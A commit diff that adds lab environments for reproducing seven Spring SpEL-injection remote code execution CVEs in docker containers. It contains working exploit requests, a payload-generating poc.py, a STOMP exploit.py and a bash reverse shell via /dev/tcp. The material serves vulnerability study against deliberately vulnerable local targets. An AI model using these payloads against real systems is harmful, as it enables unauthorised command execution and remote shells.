first commit

spring/CVE-2016-4977/README.md

@@ -0,0 +1,39 @@
+# Spring Security OAuth2 Remote Command Execution Vulnerability (CVE-2016-4977)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Spring Security OAuth provides support for using Spring Security with OAuth (1a) and OAuth2 using standard Spring and Spring Security programming models and configuration idioms.
+
+In its use of whitelabel views for error handling, an remote attacker can execute commands by constructing malicious parameters through the Springs Expression Language (SpEL).
+
+Reference links.
+
+- http://secalert.net/#CVE-2016-4977
+- https://deadpool.sh/2017/RCE-Springs/
+- http://blog.knownsec.com/2016/10/spring-security-oauth-rce/
+
+## Vulnerability environment
+
+Execute the following command to start a Spring Security OAuth application.
+
+```
+docker compose up -d
+```
+
+After the server is started, browse the ``http://your-ip:8080/`` to see its home page.
+
+## Exploit
+
+Request to the `http://your-ip:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test`, first you need to fill in the username and password, we just fill in `admin:admin` here.
+
+As you can see, SpEL expression `${233*233}` has been successfully executed and returned the result.
+
+![](1.png)
+
+We then use [poc.py](poc.py) to generate an EXP for the [reverse shell](http://www.jackson-t.ca/runtime-exec-payloads.html):
+
+![](2.png)
+
+As above, a long SpEL expression exploit is generated. Send the request with this SpEL exploit, a reverse shell is gained:
+
+![](3.png)

spring/CVE-2016-4977/README.zh-cn.md

@@ -0,0 +1,35 @@
+# Spring Security OAuth2 远程命令执行漏洞（CVE-2016-4977）
+
+Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时，由于使用了Springs Expression Language (SpEL)，攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。
+
+参考链接：
+
+- http://secalert.net/#CVE-2016-4977
+- https://deadpool.sh/2017/RCE-Springs/
+- http://blog.knownsec.com/2016/10/spring-security-oauth-rce/
+
+## 运行环境
+
+执行如下命令启动漏洞环境：
+
+```
+docker compose up -d
+```
+
+启动完成后，访问`http://your-ip:8080/`即可看到web页面。
+
+## 漏洞复现
+
+访问`http://your-ip:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test`。首先需要填写用户名和密码，我们这里填入`admin:admin`即可。
+
+可见，我们输入是SpEL表达式`${233*233}`已经成功执行并返回结果：
+
+![](1.png)
+
+然后，我们使用[poc.py](poc.py)来生成反弹shell的POC（注意：[Java反弹shell的限制与绕过方式](http://www.jackson-t.ca/runtime-exec-payloads.html)）：
+
+![](2.png)
+
+如上图，生成了一大串SpEL语句。附带上这个SpEL语句，访问成功弹回shell：
+
+![](3.png)

spring/CVE-2016-4977/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ spring:
+   image: vulhub/spring-security-oauth2:2.0.8
+   ports:
+    - "8080:8080"

spring/CVE-2016-4977/poc.py

@@ -0,0 +1,12 @@
+#!/usr/bin/env python
+
+message = input('Enter message to encode:')
+
+poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
+
+for ch in message[1:]:
+   poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch) 
+
+poc += ')}'
+
+print(poc)

spring/CVE-2017-4971/README.md

@@ -0,0 +1,48 @@
+# Spring WebFlow Remote Code Execution (CVE-2017-4971)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Spring WebFlow is a framework suitable for developing flow-based applications (such as shopping logic), which can separate the flow definition from the classes and views that implement the flow behavior. In its 2.4.x versions, if we can control the field during data binding, it will lead to a SpEL expression injection vulnerability, ultimately resulting in arbitrary command execution.
+
+Reference links:
+
+- https://threathunter.org/topic/593d562353ab369c55425a90
+- https://pivotal.io/security/cve-2017-4971
+
+## Environment Setup
+
+Execute the following command to start the a web application based on Spring WebFlow 2.4.4:
+
+```
+docker compose up -d
+```
+
+After the server starts, visit `http://your-ip:8080` to see a hotel booking page, which is a simple example provided by Spring WebFlow.
+
+## Vulnerability Reproduce
+
+First, visit `http://your-ip:8080/login` and log in to the system using any of the accounts/passwords given on the left side of the page:
+
+![](1.png)
+
+Then visit the hotel with id 1 at `http://your-ip:8080/hotels/1`, click the "Book Hotel" button, fill in the relevant information, and click "Process" (from this step, WebFlow officially begins):
+
+![](2.png)
+
+Then click "Confirm":
+
+![](3.png)
+
+At this point, intercept the request and capture a POST data packet. We add a field to it (which is the reverse shell POC):
+
+```
+_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/10.0.0.1/21 0>&1")).start()=vulhub
+```
+
+![](4.png)
+
+(Note: Don't forget to URL encode)
+
+Successfully executed, gaining shell access:
+
+![](5.png)

spring/CVE-2017-4971/README.zh-cn.md

@@ -0,0 +1,46 @@
+# Spring WebFlow 远程代码执行漏洞（CVE-2017-4971）
+
+Spring WebFlow 是一个适用于开发基于流程的应用程序的框架（如购物逻辑），可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中，如果我们控制了数据绑定时的field，将导致一个SpEL表达式注入漏洞，最终造成任意命令执行。
+
+参考链接：
+
+- https://threathunter.org/topic/593d562353ab369c55425a90
+- https://pivotal.io/security/cve-2017-4971
+
+## 测试环境
+
+执行如下命令启动一个基于Spring WebFlow 2.4.4的Web应用：
+
+```
+docker compose up -d
+```
+
+等待环境启动后，访问`http://your-ip:8080`，将看到一个酒店预订的页面，这是spring-webflow官方给的简单示例。
+
+## 漏洞复现
+
+首先访问`http://your-ip:8080/login`，用页面左边给出的任意一个账号/密码登录系统：
+
+![](1.png)
+
+然后访问id为1的酒店`http://your-ip:8080/hotels/1`，点击预订按钮"Book Hotel"，填写相关信息后点击"Process"（从这一步，其实WebFlow就正式开始了）：
+
+![](2.png)
+
+再点击确认"Confirm"：
+
+![](3.png)
+
+此时抓包，抓到一个POST数据包，我们向其中添加一个字段（也就是反弹shell的POC）：
+
+```
+_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/10.0.0.1/21 0>&1")).start()=vulhub
+```
+
+![](4.png)
+
+（注意：别忘记URL编码）
+
+成功执行，获得shell：
+
+![](5.png)

spring/CVE-2017-4971/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ spring:
+   image: vulhub/spring-webflow:2.4.4
+   ports:
+    - "8080:8080"

spring/CVE-2017-8046/README.md

@@ -0,0 +1,49 @@
+# Spring Data REST Remote Code Execution (CVE-2017-8046)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Spring Data REST is built on top of Spring Data to help developers easily create REST-style web services. In the Spring Data REST version before 2.6.9 or 3.0.1, the PATCH method of the REST API (implementing [RFC6902](https://tools.ietf.org/html/rfc6902)), the path value is passed to `setValue`, which leads to the execution of SpEL expressions, triggering a remote code execution vulnerability.
+
+Reference links:
+
+- http://xxlegend.com/2017/09/29/Spring%20Data%20Rest服务器PATCH请求远程代码执行漏洞CVE-2017-8046补充分析/
+- https://tech.meituan.com/Spring_Data_REST_远程代码执行漏洞%28CVE-2017-8046%29_分析与复现.html
+
+## Environment Setup
+
+Execute the following command to start a Web application based on Spring Data REST 2.6.6:
+
+```
+docker compose up -d
+```
+
+After the server starts, visit `http://your-ip:8080/` to see a JSON format response, indicating this is a RESTful API server.
+
+## Vulnerability Reproduce
+
+Visit `http://your-ip:8080/customers/1` to see a resource. We use a PATCH request to modify it:
+
+```
+PATCH /customers/1 HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/json-patch+json
+Content-Length: 202
+
+[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
+
+```
+
+The path value is a SpEL expression. Sending the above packet will execute the command `touch /tmp/success` represented by `new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}`. Then enter the container with `docker compose exec spring bash` to check:
+
+![](1.png)
+
+As you can see, the file "/tmp/success" has been created successfully.
+
+Change the bytecode to a reverse shell command (Note: [Java reverse shell limitations and workarounds](http://www.jackson-t.ca/runtime-exec-payloads.html)), and successfully get the shell:
+
+![](2.png)

spring/CVE-2017-8046/README.zh-cn.md

@@ -0,0 +1,47 @@
+# Spring Data Rest 远程命令执行漏洞（CVE-2017-8046）
+
+Spring Data REST是一个构建在Spring Data之上，为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中（实现[RFC6902](https://tools.ietf.org/html/rfc6902)），path的值被传入`setValue`，导致执行了SpEL表达式，触发远程命令执行漏洞。
+
+参考链接：
+
+- http://xxlegend.com/2017/09/29/Spring%20Data%20Rest服务器PATCH请求远程代码执行漏洞CVE-2017-8046补充分析/
+- https://tech.meituan.com/Spring_Data_REST_远程代码执行漏洞%28CVE-2017-8046%29_分析与复现.html
+
+## 环境搭建
+
+执行如下命令启动一个基于Spring Data REST 2.6.6的Web应用：
+
+```
+docker compose up -d
+```
+
+等待环境启动完成，然后访问`http://your-ip:8080/`即可看到json格式的返回值，说明这是一个Restful风格的API服务器。
+
+## 漏洞复现
+
+访问`http://your-ip:8080/customers/1`，看到一个资源。我们使用PATCH请求来修改之：
+
+```
+PATCH /customers/1 HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/json-patch+json
+Content-Length: 202
+
+[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
+
+```
+
+path的值是SpEL表达式，发送上述数据包，将执行`new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}`表示的命令`touch /tmp/success`。然后进入容器`docker compose exec spring bash`看看：
+
+![](1.png)
+
+可见，success成功创建。
+
+将bytecode改成反弹shell的命令（注意：[Java反弹shell的限制与绕过方式](http://www.jackson-t.ca/runtime-exec-payloads.html)），成功弹回：
+
+![](2.png)

spring/CVE-2017-8046/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ spring:
+   image: vulhub/spring-rest-data:2.6.6
+   ports:
+    - "8080:8080"

spring/CVE-2018-1270/README.md

@@ -0,0 +1,52 @@
+# Spring Messaging Remote Code Execution (CVE-2018-1270)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Spring Messaging provides messaging support for the Spring framework, with STOMP as its upper-layer protocol and SockJS as its underlying communication layer.
+
+In Spring Messaging, clients are allowed to subscribe to messages and filter them using selectors. These selectors are written in SpEL (Spring Expression Language) and parsed using `StandardEvaluationContext`, which leads to a remote code execution vulnerability.
+
+Reference links:
+
+- https://pivotal.io/security/cve-2018-1270
+- https://xz.aliyun.com/t/2252
+- https://cert.360.cn/warning/detail?id=3efa573a1116c8e6eed3b47f78723f12
+- https://github.com/CaledoniaProject/CVE-2018-1270
+
+## Vulnerability Environment
+
+Execute the following command to start a vulnerable Web application based on Spring Messaging 5.0.4:
+
+```
+docker compose up -d
+```
+
+After the server starts, visit `http://your-ip:8080` to see a web page.
+
+## Vulnerability Reproduce
+
+While many articles state that Spring Messaging is based on WebSocket communication, this is not entirely accurate. Spring Messaging is based on SockJS (which can be understood as a communication protocol), and SockJS adapts to different browsers: modern browsers use WebSocket communication, while older browsers use AJAX communication.
+
+The process of connecting to the backend server can be understood as:
+
+1. Using the [STOMP protocol](http://jmesnil.net/stomp-websocket/doc/) to combine data into a text stream
+2. Using the [SockJS protocol](https://github.com/sockjs/sockjs-client) to send the text stream, where SockJS chooses an appropriate channel (WebSocket or XHR/HTTP) to communicate with the backend
+
+Therefore, we can use HTTP to reproduce the vulnerability, which we call a "downgrade attack".
+
+I have written a simple POC script [exploit.py](exploit.py) (requires Python 3.6 or higher to execute). Since this vulnerability involves inserting a SpEL expression during subscription, and it is only triggered when a message is sent to this subscription, we need to specify the following information:
+
+1. Base URL, which in Vulhub is `http://your-ip:8080/gs-guide-websocket`
+2. The SpEL expression to execute, such as `T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')`
+3. A subscription address, which in Vulhub is: `/topic/greetings`
+4. How to trigger this subscription, i.e., how to make the backend send a message to this subscription. In Vulhub, we send a JSON containing a name to `/app/hello` to trigger this event. Of course, this would be different in real-world scenarios, so this POC is not universally applicable.
+
+Modify the POC according to your needs. If you're using the Vulhub environment, you only need to modify the URL in step 1.
+
+Execute:
+
+![](1.png)
+
+Enter the container with `docker compose exec spring bash`, and you can see that `/tmp/success` has been successfully created:
+
+![](2.png)

spring/CVE-2018-1270/README.zh-cn.md

@@ -0,0 +1,50 @@
+# Spring Messaging 远程命令执行漏洞（CVE-2018-1270）
+
+spring messaging为spring框架提供消息支持，其上层协议是STOMP，底层通信基于SockJS，
+
+在spring messaging中，其允许客户端订阅消息，并使用selector过滤消息。selector用SpEL表达式编写，并使用`StandardEvaluationContext`解析，造成命令执行漏洞。
+
+参考链接：
+
+- https://pivotal.io/security/cve-2018-1270
+- https://xz.aliyun.com/t/2252
+- https://cert.360.cn/warning/detail?id=3efa573a1116c8e6eed3b47f78723f12
+- https://github.com/CaledoniaProject/CVE-2018-1270
+
+## 漏洞环境
+
+执行如下命令启动一个基于Spring Messaging 5.0.4的Web应用：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可看到一个Web页面。
+
+## 漏洞复现
+
+网上大部分文章都说spring messaging是基于websocket通信，其实不然。spring messaging是基于sockjs（可以理解为一个通信协议），而sockjs适配多种浏览器：现代浏览器中使用websocket通信，老式浏览器中使用ajax通信。
+
+连接后端服务器的流程，可以理解为：
+
+1. 用[STOMP协议](http://jmesnil.net/stomp-websocket/doc/)将数据组合成一个文本流
+2. 用[sockjs协议](https://github.com/sockjs/sockjs-client)发送文本流，sockjs会选择一个合适的通道：websocket或xhr(http)，与后端通信
+
+所以我们可以使用http来复现漏洞，称之为"降维打击"。
+
+我编写了一个简单的POC脚本[exploit.py](exploit.py)（需要用python3.6执行），因为该漏洞是订阅的时候插入SpEL表达式，而对方向这个订阅发送消息时才会触发，所以我们需要指定的信息有：
+
+1. 基础地址，在vulhub中为`http://your-ip:8080/gs-guide-websocket`
+2. 待执行的SpEL表达式，如`T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')`
+3. 某一个订阅的地址，如vulhub中为：`/topic/greetings`
+4. 如何触发这个订阅，即如何让后端向这个订阅发送消息。在vulhub中，我们向`/app/hello`发送一个包含name的json，即可触发这个事件。当然在实战中就不同了，所以这个poc并不具有通用性。
+
+根据你自己的需求修改POC。如果是vulhub环境，你只需修改1中的url即可。
+
+执行：
+
+![](1.png)
+
+进入容器`docker compose exec spring bash`，可见`/tmp/success`已成功创建：
+
+![](2.png)

spring/CVE-2018-1270/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ spring:
+   image: vulhub/spring-messaging:5.0.4
+   ports:
+    - "8080:8080"

spring/CVE-2018-1270/exploit.py

@@ -0,0 +1,74 @@
+#!/usr/bin/env python3
+import requests
+import random
+import string
+import time
+import threading
+import logging
+import sys
+import json
+
+logging.basicConfig(stream=sys.stdout, level=logging.INFO)
+
+def random_str(length):
+    letters = string.ascii_lowercase + string.digits
+    return ''.join(random.choice(letters) for c in range(length))
+
+
+class SockJS(threading.Thread):
+    def __init__(self, url, *args, **kwargs):
+        super().__init__(*args, **kwargs)
+        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
+        self.daemon = True
+        self.session = requests.session()
+        self.session.headers = {
+            'Referer': url,
+            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
+        }
+        self.t = int(time.time()*1000)
+
+    def run(self):
+        url = f'{self.base}/htmlfile?c=_jp.vulhub'
+        response = self.session.get(url, stream=True)
+        for line in response.iter_lines():
+            time.sleep(0.5)
+    
+    def send(self, command, headers, body=''):
+        data = [command.upper(), '\n']
+
+        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
+        
+        data.append('\n\n')
+        data.append(body)
+        data.append('\x00')
+        data = json.dumps([''.join(data)])
+
+        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
+        if response.status_code != 204:
+            logging.info(f"send '{command}' data error.")
+        else:
+            logging.info(f"send '{command}' data success.")
+
+    def __del__(self):
+        self.session.close()
+
+
+sockjs = SockJS('http://your-ip:8080/gs-guide-websocket')
+sockjs.start()
+time.sleep(1)
+
+sockjs.send('connect', {
+    'accept-version': '1.1,1.0',
+    'heart-beat': '10000,10000'
+})
+sockjs.send('subscribe', {
+    'selector': "T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')",
+    'id': 'sub-0',
+    'destination': '/topic/greetings'
+})
+
+data = json.dumps({'name': 'vulhub'})
+sockjs.send('send', {
+    'content-length': len(data),
+    'destination': '/app/hello'
+}, data)

spring/CVE-2018-1273/README.md

@@ -0,0 +1,50 @@
+# Spring Data Commons Remote Code Execution (CVE-2018-1273)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Spring Data is an open-source framework designed to simplify database access and support cloud services. Spring Data Commons serves as the foundational framework shared by all sub-projects under Spring Data.
+
+In versions 2.0.5 and earlier of Spring Data Commons, there exists a SpEL (Spring Expression Language) injection vulnerability that allows attackers to inject malicious SpEL expressions to execute arbitrary commands.
+
+Reference links:
+
+- https://pivotal.io/security/cve-2018-1273
+- https://xz.aliyun.com/t/2269
+- https://mp.weixin.qq.com/s?__biz=MzU0NzYzMzU0Mw==&mid=2247483666&idx=1&sn=91e3b2aab354c55e0677895c02fb068c
+
+## Environment Setup
+
+Execute the following command to start a Web application based on Spring Data Commons 2.0.5:
+
+```
+docker compose up -d
+```
+
+After a short wait and once the server starts, visit `http://your-ip:8080/users` to see a user registration page.
+
+## Vulnerability Reproduce
+
+Referring to the payload from the reference links, intercept the registration request and modify it to the following:
+
+```
+POST /users?page=&size=5 HTTP/1.1
+Host: localhost:8080
+Connection: keep-alive
+Content-Length: 124
+Pragma: no-cache
+Cache-Control: no-cache
+Origin: http://localhost:8080
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://localhost:8080/users?page=0&size=5
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+
+username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
+```
+
+Execute `docker compose exec spring bash` to enter the container, and you can see that `/tmp/success` has been successfully created, indicating that the command execution was successful:
+
+![](1.png)

spring/CVE-2018-1273/README.zh-cn.md

@@ -0,0 +1,46 @@
+# Spring Data Commons 远程命令执行漏洞（CVE-2018-1273）
+
+Spring Data是一个用于简化数据库访问，并支持云服务的开源框架，Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中，存在一处SpEL表达式注入漏洞，攻击者可以注入恶意SpEL表达式以执行任意命令。
+
+参考链接：
+
+- https://pivotal.io/security/cve-2018-1273
+- https://xz.aliyun.com/t/2269
+- https://mp.weixin.qq.com/s?__biz=MzU0NzYzMzU0Mw==&mid=2247483666&idx=1&sn=91e3b2aab354c55e0677895c02fb068c
+
+## 环境搭建
+
+执行下面命令启动漏洞环境：
+
+```
+docker compose up -d
+```
+
+稍等一会，环境启动后，访问`http://your-ip:8080/users`，将可以看到一个用户注册页面。
+
+## 漏洞复现
+
+参考前面链接中的Payload，在注册的时候抓包，并修改成如下数据包：
+
+```
+POST /users?page=&size=5 HTTP/1.1
+Host: localhost:8080
+Connection: keep-alive
+Content-Length: 124
+Pragma: no-cache
+Cache-Control: no-cache
+Origin: http://localhost:8080
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://localhost:8080/users?page=0&size=5
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+
+username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
+```
+
+执行`docker compose exec spring bash`进入容器中，可见成功创建`/tmp/success`，说明命令执行成功：
+
+![](1.png)

spring/CVE-2018-1273/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ spring:
+   image: vulhub/spring-data-commons:2.0.5
+   ports:
+    - "8080:8080"

spring/CVE-2022-22947/README.md

@@ -0,0 +1,120 @@
+# Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Spring Cloud Gateway provides a library for building an API Gateway on top of Spring WebFlux.
+
+Applications using Spring Cloud Gateway in the version prior to 3.1.0 and 3.0.6, are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
+
+References:
+
+- <https://tanzu.vmware.com/security/cve-2022-22947>
+- <https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/>
+
+## Vulnerability Environment
+
+Execute the following command to start a server that uses Spring Cloud Gateway 3.1.0:
+
+```
+docker compose up -d
+```
+
+After server is started, browse the `http://your-ip:8080` to see an example page.
+
+## Vulnerability Reproduce
+
+Firstly, send the following request to add a router which contains an evil SpEL expression:
+
+```
+POST /actuator/gateway/routes/hacktest HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/json
+Content-Length: 329
+
+{
+  "id": "hacktest",
+  "filters": [{
+    "name": "AddResponseHeader",
+    "args": {
+      "name": "Result",
+      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
+    }
+  }],
+  "uri": "http://example.com"
+}
+```
+
+![](1.png)
+
+Secondly, refresh the gateway. The SpEL expression will be executed in this step:
+
+```
+POST /actuator/gateway/refresh HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+
+```
+
+![](2.png)
+
+Thirdly, send the following request to retrieve the result:
+
+```
+GET /actuator/gateway/routes/hacktest HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+
+```
+
+![](3.png)
+
+Afterward, send a DELETE request to remove our evil router:
+
+```
+DELETE /actuator/gateway/routes/hacktest HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+
+
+```
+
+![](4.png)
+
+Finally, refresh the gateway again:
+
+```
+POST /actuator/gateway/refresh HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+
+```

spring/CVE-2022-22947/README.zh-cn.md

@@ -0,0 +1,118 @@
+# Spring Cloud Gateway Actuator API SpEL表达式注入命令执行（CVE-2022-22947）
+
+Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（包含）以前存在一处SpEL表达式注入漏洞，当攻击者可以访问Actuator API的情况下，将可以利用该漏洞执行任意命令。
+
+参考链接：
+
+- <https://tanzu.vmware.com/security/cve-2022-22947>
+- <https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/>
+
+## 漏洞环境
+
+执行如下命令启动一个使用了Spring Cloud Gateway 3.1.0的Web服务：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080`即可看到演示页面，这个页面的上游就是example.com。
+
+## 漏洞复现
+
+利用这个漏洞需要分多步。
+
+首先，发送如下数据包即可添加一个包含恶意SpEL表达式的路由：
+
+```
+POST /actuator/gateway/routes/hacktest HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/json
+Content-Length: 329
+
+{
+  "id": "hacktest",
+  "filters": [{
+    "name": "AddResponseHeader",
+    "args": {
+      "name": "Result",
+      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
+    }
+  }],
+  "uri": "http://example.com"
+}
+```
+
+![](1.png)
+
+然后，发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行：
+
+```
+POST /actuator/gateway/refresh HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+
+```
+
+![](2.png)
+
+发送如下数据包即可查看执行结果：
+
+```
+GET /actuator/gateway/routes/hacktest HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+
+```
+
+![](3.png)
+
+最后，发送如下数据包清理现场，删除所添加的路由：
+
+```
+DELETE /actuator/gateway/routes/hacktest HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+
+
+```
+
+![](4.png)
+
+再刷新下路由：
+
+```
+POST /actuator/gateway/refresh HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+
+```

spring/CVE-2022-22947/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+ spring:
+   image: vulhub/spring-cloud-gateway:3.1.0
+   ports:
+    - "8080:8080"
+    - "5005:5005"

spring/CVE-2022-22963/README.md

@@ -0,0 +1,48 @@
+# Spring Cloud Function SpEL Code Injection (CVE-2022-22963)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Spring Cloud Function provides a common model for deploying function-based software on a variety of platforms, including FaaS (function as a service) platforms like Amazon AWS Lambda.
+
+References:
+
+- <https://tanzu.vmware.com/security/cve-2022-22963>
+- <https://mp.weixin.qq.com/s/onYJWIESgLaWS64lCgsKdw>
+- <https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f>
+
+## Vulnerability Environment
+
+Execute the following command to start a server that uses Spring Cloud Function 3.2.2:
+
+```
+docker compose up -d
+```
+
+After server is started, execute `curl http://your-ip:8080/uppercase -H "Content-Type: text/plain" --data-binary test` you can convert the user input to uppercase.
+
+## Vulnerability Reproduce
+
+There is a SpEL expression injection in the request header `spring.cloud.function.routing-expression`.
+
+Send the following request to execute `touch /tmp/success` on the target server:
+
+```
+POST /functionRouter HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
+Content-Type: text/plain
+Content-Length: 4
+
+test
+```
+
+![](1.png)
+
+As you can see, `touch /tmp/success` has been executed successfully.
+
+![](2.png)

